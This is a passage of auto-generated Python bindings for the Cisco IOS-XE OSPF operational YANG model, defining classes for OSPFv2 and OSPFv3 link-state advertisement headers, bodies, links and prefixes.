                                        self.referenced_link_state_id = None
                                        self.referenced_adv_router = None
                                        self.num_of_prefixes = None
                                        self._segment_path = lambda: "ia-prefix"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
                        class Ospfv3Link(Entity):
                            """Generated binding for keyed YANG list 'ospfv3-link' under 'area-scope-lsa' (Cisco-IOS-XE ospf-oper); keys: interface-id, neighbor-interface-id, neighbor-router-id."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__()
                                self.yang_name = "ospfv3-link"
                                self.yang_parent_name = "area-scope-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
                                    ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
                                    ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
                                    ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                ])
                                self.interface_id = None
                                self.neighbor_interface_id = None
                                self.neighbor_router_id = None
                                self.type = None
                                self.metric = None
                                # All three list keys are embedded in the segment path for entry addressing.
                                self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
                        class Ospfv3Prefix(Entity):
                            """Generated binding for keyed YANG list 'ospfv3-prefix' under 'area-scope-lsa' (Cisco-IOS-XE ospf-oper); key: prefix."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__()
                                self.yang_name = "ospfv3-prefix"
                                self.yang_parent_name = "area-scope-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['prefix']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                    ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                                ])
                                self.prefix = None
                                self.prefix_options = None
                                self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
                        class Ospfv3IaPrefix(Entity):
                            """Generated binding for keyed YANG list 'ospfv3-ia-prefix' under 'area-scope-lsa' (Cisco-IOS-XE ospf-oper); key: prefix."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__()
                                self.yang_name = "ospfv3-ia-prefix"
                                self.yang_parent_name = "area-scope-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['prefix']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                    ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                                ])
                                self.prefix = None
                                self.prefix_options = None
                                self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
            class LinkScopeLsas(Entity):
                """Generated binding for keyed YANG list 'link-scope-lsas' under 'ospf-instance' (Cisco-IOS-XE ospf-oper); key: lsa-type. Child classes LinkScopeLsa and AreaScopeLsa are declared later in this class body."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__()
                    self.yang_name = "link-scope-lsas"
                    self.yang_parent_name = "ospf-instance"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = ['lsa_type']
                    self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))])
                    self._leafs = OrderedDict([
                        ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                    ])
                    self.lsa_type = None
                    # YANG list children are held in YList containers bound to this parent.
                    self.link_scope_lsa = YList(self)
                    self.area_scope_lsa = YList(self)
                    self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
                    # Must be set last: once frozen, attribute writes are validated by __setattr__.
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value)
                class LinkScopeLsa(Entity):
                    """Generated binding for keyed YANG list 'link-scope-lsa' under 'link-scope-lsas' (Cisco-IOS-XE ospf-oper); keys: lsa-id, adv-router. Holds the raw LSA bytes plus decoded OSPFv2/OSPFv3 views; child classes are declared later in this class body."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__()
                        self.yang_name = "link-scope-lsa"
                        self.yang_parent_name = "link-scope-lsas"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['lsa_id','adv_router']
                        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
                        self._leafs = OrderedDict([
                            ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
                            ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                            ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                            ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
                            ('version', (YLeaf(YType.uint32, 'version'), ['int'])),
                            ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
                        ])
                        self.lsa_id = None
                        self.adv_router = None
                        self.decoded_completed = None
                        # leaf-list of uint8: the undecoded LSA bytes.
                        self.raw_data = []
                        self.version = None
                        self.router_address = None
                        self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
                        self.ospfv2_lsa.parent = self
                        self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
                        self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
                        self.ospfv3_lsa_val.parent = self
                        self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
                        self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv()
                        self.tlv.parent = self
                        self._children_name_map["tlv"] = "tlv"
                        self.ospfv2_link = YList(self)
                        self.ospfv2_topology = YList(self)
                        self.ospfv2_external = YList(self)
                        self.ospfv2_unknown_tlv = YList(self)
                        self.ospfv3_link = YList(self)
                        self.ospfv3_prefix_list = YList(self)
                        self.ospfv3_ia_prefix = YList(self)
                        self.multi_topology = YList(self)
                        self.unknown_sub_tlv = YList(self)
                        self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
                    class Ospfv2Lsa(Entity):
                        """Generated binding for YANG container 'ospfv2-lsa' under 'link-scope-lsa' (Cisco-IOS-XE ospf-oper): decoded OSPFv2 LSA with 'header' and 'lsa-body' child containers."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
                            self.yang_name = "ospfv2-lsa"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
                            self._leafs = OrderedDict()
                            self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
                            self.header.parent = self
                            self._children_name_map["header"] = "header"
                            self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
                            self.lsa_body.parent = self
                            self._children_name_map["lsa_body"] = "lsa-body"
                            self._segment_path = lambda: "ospfv2-lsa"
                            # Must be set last: once frozen, attribute writes are validated by __setattr__.
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)
                        class Header(Entity):
                            """Generated binding for YANG container 'header' under 'ospfv2-lsa': standard OSPFv2 LSA header fields (age, type, adv-router, seq-num, checksum, length, options)."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
                                self.yang_name = "header"
                                self.yang_parent_name = "ospfv2-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                    ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                                    ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                                    ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                    ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                    ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                    ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                    ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                    ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                    ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
                                ])
                                self.lsa_id = None
                                self.opaque_type = None
                                self.opaque_id = None
                                self.age = None
                                self.type = None
                                self.adv_router = None
                                self.seq_num = None
                                self.checksum = None
                                self.length = None
                                # Bits-typed leaf gets an empty Bits container rather than None.
                                self.flag_options = Bits()
                                self._segment_path = lambda: "header"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
                        class LsaBody(Entity):
                            """Generated binding for YANG container 'lsa-body' under 'ospfv2-lsa': decoded OSPFv2 LSA body (link count, summary/external masks, flags) with a 'network' child container."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
                                self.yang_name = "lsa-body"
                                self.yang_parent_name = "ospfv2-lsa"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
                                self._leafs = OrderedDict([
                                    ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                                    ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                                    ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                                    ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
                                ])
                                self.num_of_links = None
                                self.summary_mask = None
                                self.external_mask = None
                                self.body_flag_options = Bits()
                                self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
                                self.network.parent = self
                                self._children_name_map["network"] = "network"
                                self._segment_path = lambda: "lsa-body"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
                            class Network(Entity):
                                """Generated binding for YANG container 'network' under 'lsa-body': network-LSA mask and attached-router leaf-list."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                                    self.yang_name = "network"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                    ])
                                    self.network_mask = None
                                    # leaf-list of router IDs.
                                    self.attached_router = []
                                    self._segment_path = lambda: "network"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
                    class Ospfv2Link(Entity):
                        """Generated binding for keyed YANG list 'ospfv2-link' under 'link-scope-lsa' (Cisco-IOS-XE ospf-oper); keys: link-id, link-data. Carries per-topology metrics in the nested 'ospfv2-topology' list."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
                            self.yang_name = "ospfv2-link"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['link_id','link_data']
                            self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
                            self._leafs = OrderedDict([
                                ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                                ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                                ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                            ])
                            self.link_id = None
                            self.link_data = None
                            self.type = None
                            self.ospfv2_topology = YList(self)
                            self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
                        class Ospfv2Topology(Entity):
                            """Generated binding for keyed YANG list 'ospfv2-topology' under 'ospfv2-link'; key: mt-id. Per-topology link metric."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
                                self.yang_name = "ospfv2-topology"
                                self.yang_parent_name = "ospfv2-link"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['mt_id']
                                self._child_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                ])
                                self.mt_id = None
                                self.metric = None
                                self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                    class Ospfv2Topology(Entity):
                        """Generated binding for keyed YANG list 'ospfv2-topology' directly under 'link-scope-lsa' (distinct from the same-named list under 'ospfv2-link'); key: mt-id."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
                            self.yang_name = "ospfv2-topology"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['mt_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                            ])
                            self.mt_id = None
                            self.metric = None
                            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
                    class Ospfv2External(Entity):
                        """Generated binding for keyed YANG list 'ospfv2-external' under 'link-scope-lsa' (Cisco-IOS-XE ospf-oper); key: mt-id. External-LSA metric, forwarding address, and route tag."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
                            self.yang_name = "ospfv2-external"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['mt_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                            ])
                            self.mt_id = None
                            self.metric = None
                            self.forwarding_address = None
                            self.external_route_tag = None
                            self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
                    class Ospfv2UnknownTlv(Entity):
                        """Generated binding for keyed YANG list 'ospfv2-unknown-tlv' under 'link-scope-lsa' (Cisco-IOS-XE ospf-oper); key: type. Raw type/length/value of an unrecognized TLV."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
                            self.yang_name = "ospfv2-unknown-tlv"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['type']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
                            ])
                            self.type = None
                            self.length = None
                            # leaf-list of uint8: the TLV payload bytes.
                            self.value = []
                            self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
                    class Ospfv3LsaVal(Entity):
                        """Generated binding for YANG container 'ospfv3-lsa-val' under 'link-scope-lsa' (Cisco-IOS-XE ospf-oper): decoded OSPFv3 LSA with 'header' and 'lsa-body' children; child classes are declared later in this class body."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
                            self.yang_name = "ospfv3-lsa-val"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
                            self._leafs = OrderedDict()
                            self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
                            self.header.parent = self
                            self._children_name_map["header"] = "header"
                            self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
                            self.lsa_body.parent = self
                            self._children_name_map["lsa_body"] = "lsa-body"
                            self._segment_path = lambda: "ospfv3-lsa-val"
                            # Must be set last: once frozen, attribute writes are validated by __setattr__.
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
                        class Header(Entity):
                            """Generated binding for YANG container 'header' under 'ospfv3-lsa-val': OSPFv3 LSA ID/options plus the common 'lsa-header' child container."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
                                self.yang_name = "header"
                                self.yang_parent_name = "ospfv3-lsa-val"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
                                self._leafs = OrderedDict([
                                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                    ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
                                ])
                                self.lsa_id = None
                                # Bits-typed leaf gets an empty Bits container rather than None.
                                self.lsa_hdr_options = Bits()
                                self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
                                self.lsa_header.parent = self
                                self._children_name_map["lsa_header"] = "lsa-header"
                                self._segment_path = lambda: "header"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
                            class LsaHeader(Entity):
                                """Generated binding for YANG container 'lsa-header' under 'header': common LSA header fields (age, type, adv-router, seq-num, checksum, length)."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
                                    self.yang_name = "lsa-header"
                                    self.yang_parent_name = "header"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                        ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                        ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                        ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                    ])
                                    self.age = None
                                    self.type = None
                                    self.adv_router = None
                                    self.seq_num = None
                                    self.checksum = None
                                    self.length = None
                                    self._segment_path = lambda: "lsa-header"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
                        class LsaBody(Entity):
                            """Generated binding for YANG container 'lsa-body' under 'ospfv3-lsa-val' (Cisco-IOS-XE ospf-oper): decoded OSPFv3 LSA body with network/prefix/ia-router/lsa-external/nssa/link-data/ia-prefix children; child classes are declared later in this class body."""
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
                                self.yang_name = "lsa-body"
                                self.yang_parent_name = "ospfv3-lsa-val"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
